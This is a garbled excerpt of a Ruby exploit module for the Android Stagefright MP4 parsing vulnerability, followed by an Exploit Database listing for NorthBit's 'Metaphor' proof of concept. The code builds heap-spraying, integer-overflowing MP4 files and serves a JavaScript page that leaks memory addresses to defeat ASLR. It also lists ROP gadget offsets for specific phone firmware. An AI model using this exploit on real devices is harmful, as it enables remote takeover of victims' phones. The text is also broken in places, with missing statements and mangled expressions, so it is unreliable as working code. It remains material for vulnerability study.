# immediately propagate the error to the caller. Instead, it returns OK.
# This allows us to triggering the bug multiple times in one file, or --
# as we have in this case -- survive after and return successfully.
if is_samsung
# Add this as a nested track!
trak_data << get_atom('trak', trigger)
trak_data << trigger
trak = get_atom('trak', trak_data)
# On Samsung devices, we could put more chunks here but they will
# end up smashing the temporary buffer further...
chunks = []
chunks << get_ftyp()
chunks << get_atom('moov')
chunks << verified_trak * 0x200
chunks << shape_vector * groom_count
chunks << trak
mp4 = chunks.join
def get_mp4_rce(my_target, peer)
# MPEG4 Fileformat Reference:
# Structure:
# [File type Chunk][Other Atom Chunks]
# Where [Chunk] == [Atom/Box Length][Atom/Box Type][Atom/Box Data]
chunks = []
chunks << get_ftyp()
# Note, this causes a few allocations
moov_data = ''
mvhd_data = [ 0, 0x41414141 ].pack('N*')
mvhd_data << 'B' * 0x5c
moov_data << get_atom('mvhd', mvhd_data)
# Add a minimal, verified 'trak' to satisfy mLastTrack being set
verified_trak = ''
stbl_data = get_stsc(0x28)
stbl_data << get_atom('stco', [ 0, 0 ].pack('N*')) # version, mNumChunkOffsets
stbl_data << get_atom('stsz', [ 0, 0, 0 ].pack('N*')) # version, mDefaultSampleSize, mNumSampleSizes
stbl_data << get_atom('stts', [ 0, 0 ].pack('N*')) # version, mTimeToSampleCount
verified_trak << get_atom('trak', get_atom('stbl', stbl_data))
# Add it to the file
moov_data << verified_trak
# The spray_addr field is typically determined empirically (by testing), but
# has proven to be fairly predictable (99%). However, it does vary from
# one device to the next (probably determined by the pre-loaded libraries).
spray_addr = 0xb0c08000
spray_addr = my_target['SprayAddress'] if not my_target['SprayAddress'].nil?
# Construct a single page that we will spray
page = build_spray(my_target, peer, spray_addr)
return nil if page.nil?
# Build a big block full of spray pages and and put it in an avcC chunk
# (but don't add it to the 'moov' yet)
spray = page * (((16 * 1024 * 1024) / page.length) - 20)
avcc = get_atom('avcC', spray)
# Make the nasty trak
tkhd1 = ''
tkhd1 << [ 0 ].pack('C') # version
tkhd1 << 'D' * 3 # padding
tkhd1 << 'E' * (5*4) # {c,m}time, id, ??, duration
tkhd1 << 'F' * 0x10 # ??
tkhd1 << [
0x10000, # a00
0, # a01
0, # dx
0, # a10
0x10000, # a11
0 # dy
tkhd1 << 'G' * 0x14 # ??
# Add the tkhd (track header) to the nasty track
trak1 = ''
trak1 << get_atom('tkhd', tkhd1)
# Build and add the 'mdia' (Media information) to the nasty track
mdia1 = ''
mdhd1 = [ 0 ].pack('C') # version
mdhd1 << 'D' * 0x17 # padding
mdia1 << get_atom('mdhd', mdhd1)
mdia1 << get_atom('hdlr', 'F' * 0x38) # Media handler
dinf1 = ''
dinf1 << get_atom('dref', 'H' * 0x14) # Data information box
minf1 = ''
minf1 << get_atom('smhd', 'G' * 0x08)
minf1 << get_atom('dinf', dinf1)
stbl1 = get_stsc(2)
minf1 << get_atom('stbl', stbl1)
mdia1 << get_atom('minf', minf1)
trak1 << get_atom('mdia', mdia1)
# Add something to take up a slot in the 0x20 size range
# NOTE: We have to be able to free this later...
block = 'Q' * 0x1c
trak1 << get_atom('covr', get_atom('data', [ 0, 0 ].pack('N*') + block))
# Add a Track (hopefully right after)
trak1 << verified_trak
# Add the avcC chunk with the heap spray. We add it here so it's sure to be
# allocated when we get control of the program counter...
trak1 << avcc
# Build the first of the nasty pair of tx3g chunks that trigger the
# vulnerability
alloc_size = 0x20
overflow_size = 0xc0
overflow = [ spray_addr ].pack('V') * (overflow_size / 4)
tx3g_1 = get_atom('tx3g', overflow)
trak1 << tx3g_1
# Free the original thing and put the tx3g temporary in it's place...
block = 'R' * 0x40
trak1 << get_atom('covr', get_atom('data', [ 0, 0 ].pack('N*') + block))
# Make the second one, which triggers the integer overflow
big_num = 0x1ffffffff - 8 - overflow.length + 1 + alloc_size
more_data = [ spray_addr ].pack('V') * (overflow_size / 4)
tx3g_2 = get_atom('tx3g', more_data, big_num)
trak1 << tx3g_2
# Add the nasty track to the moov data
moov_data << get_atom('trak', trak1)
# Finalize the moov chunk
moov = get_atom('moov', moov_data)
chunks << moov
# Combine outer chunks together and voila.
mp4 = chunks.join
def on_request_uri(cli, request)
# If the request is for an mp4 file, we need to get the target from the @peers hash
if request.uri =~ /\.mp4\?/i
mp4_fn = request.uri.split('/')[-1]
mp4_fn = mp4_fn.split('?')[0]
mp4_fn[-4,4] = ''
peer = @peers[mp4_fn]
my_target = nil
my_target = peer[:target] if peer
if my_target.nil?
print_error("#{cli.peerhost}:#{cli.peerport} - Requested #{request.uri} - Unknown peer")
# Extract the address(s) we just leaked...
sia_addr = request.qstring['sia'].to_i # near_sampiter data address
peer[:near_sampiter_addr] = sia_addr if sia_addr > 0
sfv_addr = request.qstring['sfv'].to_i # stagefright Vector<size_t> vtable ptr
peer[:vector_vtable_addr] = sfv_addr if sfv_addr > 0
# reset after a crash..
if sia_addr == 0 && sfv_addr == 0
peer[:near_sampiter_addr] = peer[:vector_vtable_addr] = nil
# Always use this header
out_hdrs = {'Content-Type'=>'video/mp4'}
if peer[:vector_vtable_addr].nil?
# Generate the nasty MP4 to leak infoz
mode = "infoleak"
mp4 = get_mp4_leak(my_target, peer)
mode = "RCE"
mp4 = get_mp4_rce(my_target, peer)
if mp4.nil?
print_error("#{cli.peerhost}:#{cli.peerport} - Requested #{request.uri} - Failed to generate RCE MP4")
# Send the nasty MP4 file to trigger the vulnerability
if request.headers['Accept-Encoding'] and request.headers['Accept-Encoding'].include? 'gzip'
mp4 = Rex::Text.gzip(mp4)
out_hdrs.merge!('Content-Encoding' => 'gzip')
gzip = "gzip'd"
gzip = "raw"
client = "Browser"
if request.headers['User-Agent'].include? 'stagefright'
client = "SF"
addrs = "heap: 0x%x, code: 0x%x" % [ peer[:near_sampiter_addr].to_i, peer[:vector_vtable_addr].to_i ]
print_status("Sending #{mode} #{gzip} MPEG4 (#{mp4.length} bytes) to #{cli.peerhost}:#{cli.peerport}... (#{addrs} from #{client})")
# Send the nastiness!
send_response(cli, mp4, out_hdrs)
# Initialize a target. If none suitable, then we don't continue.
my_target = target
if =~ /Automatic/
my_target = get_target(request)
if my_target.nil?
print_error("#{cli.peerhost}:#{cli.peerport} - Requested #{request.uri} - Unknown user-agent: #{request['User-Agent'].inspect}")
vprint_status("Target selected: #{}")
# Generate an MP4 filename for this peer
mp4_fn = rand_text_alpha(11)
# Save the target for when they come back asking for this file
# Also initialize the leak address to the first one
@peers[mp4_fn] = { :target => my_target }
# Send the index page
mp4_uri = "#{get_resource.chomp('/')}/#{mp4_fn}.mp4"
html = %Q^<html>
<title>Please wait...</title>
var video; // the video tag
var to_id; // timeout ID
var req_start; // when we requested the video
var load_start; // when we loaded the video
// Give mediaserver some time to settle down after restarting -- increases reliability
var waitTime = 100; // 6000;
var error = false;
var near_sampiter_addr = -1;
var vector_vtable_addr = -1;
var crashes = 0;
function duration_changed() {
var now =;
var req_time = now - req_start;
var load_time = now - load_start;
console.log('duration changed to: ' + video.duration + ' (load: ' + load_time + ', req: ' + req_time + '), 0x' + video.videoWidth.toString(16) + ' x 0x' + video.videoHeight.toString(16));
if (load_time > 2000) {
// probably crashed. reset the entire process..
near_sampiter_addr = -1;
vector_vtable_addr = -1;
waitTime = 6000;
crashes += 1;
if (crashes > 5) {
console.log('too many crashes!!!');
else {
// if we got the near_sampiter_addr already, we are now trying to read the code pointer.
// otherwise, we're trying to find near_sampiter_addr...
if (near_sampiter_addr == -1) {
// if we get this value, we failed to overwrite the metadata. try again.
if (video.videoHeight != 768) { // XXX: TODO: parameterize
if (video.videoHeight != 0) { // wtf? crashed??
value = video.videoHeight;
console.log('leaked heap pointer: 0x' + value.toString(16));
near_sampiter_addr = value;
} else if (vector_vtable_addr == -1) {
// if we get this value, we failed to overwrite the metadata. try again.
if (video.duration != 314) { // XXX: TODO: parameterize
// zero means a value that could not be represented...
if (video.duration != 0) {
var value = Math.round(video.duration * 1000000);
console.log('leaked memory: ' + video.duration + ' (near_sampiter_addr: 0x' + near_sampiter_addr.toString(16) + '): 0x' + value.toString(16));
vector_vtable_addr = value;
// otherwise, we just keep trying with the data we have...
if (error == false) {
if (vector_vtable_addr == -1) {
to_id = setTimeout(reload_leak, waitTime);
} else {
to_id = setTimeout(reload_rce, waitTime);
waitTime = 100;
function stop_everything() {
if (error == false) {
console.log('---- GIVING UP!! ----');
error = true;
if (to_id != -1) {
function start() {
video = document.getElementById('vid');
video.onerror = function() {
console.log(' onError called!');
video.ondurationchange = duration_changed;
function get_uri() {
var rn = Math.floor(Math.random() * (0xffffffff - 1)) + 1;
var uri = '#{mp4_uri}?x=' + rn;
if (near_sampiter_addr != -1) {
uri += '&sia=' + near_sampiter_addr;
if (vector_vtable_addr != -1) {
uri += '&sfv=' + vector_vtable_addr;
return uri;
function reload_leak() {
to_id = -1;
var xhr = new XMLHttpRequest;
xhr.responseType = 'blob';
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
if (xhr.status != 200 || !xhr.response) {
load_start =;
try {
//var url = URL.createObjectURL(xhr.response);
var a = new FileReader();
a.onload = function(e) {
//console.log('onload: ' +;
video.src =
a.onerror = function(e) { console.log('blob 2 data error: ' + e.error); }
} catch(e) {
console.log(' ERROR: ' + e.message);
};'GET', get_uri(), true);
req_start =;
function reload_rce() {
to_id = -1;
video.src = get_uri();
<body onload='start()'>
<video id=vid width=1px controls>
Your browser does not support VIDEO tags.
</video><br />
Please wait while we locate your content...
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, html, {'Content-Type'=>'text/html'})
# Return some firmware-specific values to the caller.
# The VectorRVA field is extracted using the following command:
# $ arm-eabi-readelf -a | grep _ZTVN7android6VectorIjEE
def get_details(my_target)
details = {
'lrx' => {
'VectorRVA' => 0x10ae30,
'PivotStrategy' => 'lrx',
'Pivot1' => 0x67f7b, # ldr r4, [r0] ; ldr r1, [r4, #0x10] ; blx r1
'Pivot2' => 0xaf9dd, # ldm.w r4, {sp} ; pop {r3, pc}
'Adjust' => 0x475cd # pop {r3, r4, pc}
'lmy-1' => {
'VectorRVA' => 0x10bd58,
'PivotStrategy' => 'lmy-1',
'Pivot1' => 0x68783, # ldr r4, [r0] ; ldr r1, [r4, #0x10] ; blx r1
'Pivot2' => 0x81959, # ldm.w r4, {r1, ip, sp, pc}
'Adjust' => 0x479b1 # pop {r3, r4, pc}
'lmy-2' => {
'VectorRVA' => 0x10bd58,
'PivotStrategy' => 'lmy-2',
'Pivot1' => 0x6f093, # ldr r0, [r0, #0x10] ; ldr r3, [r0] ; ldr r1, [r3, #0x18] ; blx r1
'Pivot2' => 0x81921, # ldm.w r0!, {r1, ip, sp, pc}
'Adjust' => 0x479b1 # pop {r3, r4, pc}
'shamu / LYZ28E' => {
'VectorRVA' => 0x116d58,
'PivotStrategy' => 'lyz',
'Pivot1' => 0x91e91, # ldr r0, [r0] ; ldr r6, [r0] ; ldr r3, [r6] ; blx r3
'Pivot2' => 0x72951, # ldm.w r0, {r0, r2, r3, r4, r6, r7, r8, sl, fp, sp, lr, pc}
'Adjust' => 0x44f81 # pop {r3, r4, pc}
'shamu / LYZ28J' => {
'VectorRVA' => 0x116d58,
'PivotStrategy' => 'lyz',
'Pivot1' => 0x91e49, # ldr r0, [r0] ; ldr r6, [r0] ; ldr r3, [r6] ; blx r3
'Pivot2' => 0x72951, # ldm.w r0, {r0, r2, r3, r4, r6, r7, r8, sl, fp, sp, lr, pc}
'Adjust' => 0x44f81 # pop {r3, r4, pc}
'sm-g900v / OE1' => {
'VectorRVA' => 0x174048,
'PivotStrategy' => 'sm-g900v',
'Pivot1' => 0x89f83, # ldr r4, [r0] ; ldr r5, [r4, #0x20] ; blx r5
'Pivot2' => 0xb813f, # ldm.w r4!, {r5, r7, r8, fp, sp, lr} ; cbz r0, #0xb8158 ; ldr r1, [r0] ; ldr r2, [r1, #4] ; blx r2
'Adjust' => 0x65421 # pop {r4, r5, pc}
Exploit Database EDB-ID : 39640
Publication date : 2016-03-29 22h00 +00:00
Author : NorthBit
EDB Verified : No
Metaphor - Stagefright with ASLR bypass By Hanan Be'er from NorthBit Ltd.
Link to whitepaper:
Metaphor's source code is now released! The source include a PoC that generates MP4 exploits in real-time and bypassing ASLR. The PoC includes lookup tables for Nexus 5 Build LRX22C with Android 5.0.1. Server-side of the PoC include simple PHP scripts that run the exploit generator - I'm using XAMPP to serve gzipped MP4 files. The attack page is index.php.
The exploit generator is written in Python and used by the PHP code.
usage: [-h] [-c CONFIG] -o OUTPUT {leak,rce,suicide} ...
positional arguments:
{leak,rce,suicide} Type of exploit to generate
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
Override exploit configuration
-o OUTPUT, --output OUTPUT
Credits: To the NorthBit team E.P. - My shining paladin, for assisting in boosting this project to achieve all the goals.
Proof of Concept:
Products Mentioned
Configuraton 0
Google>>Android >> Version To (including) 5.1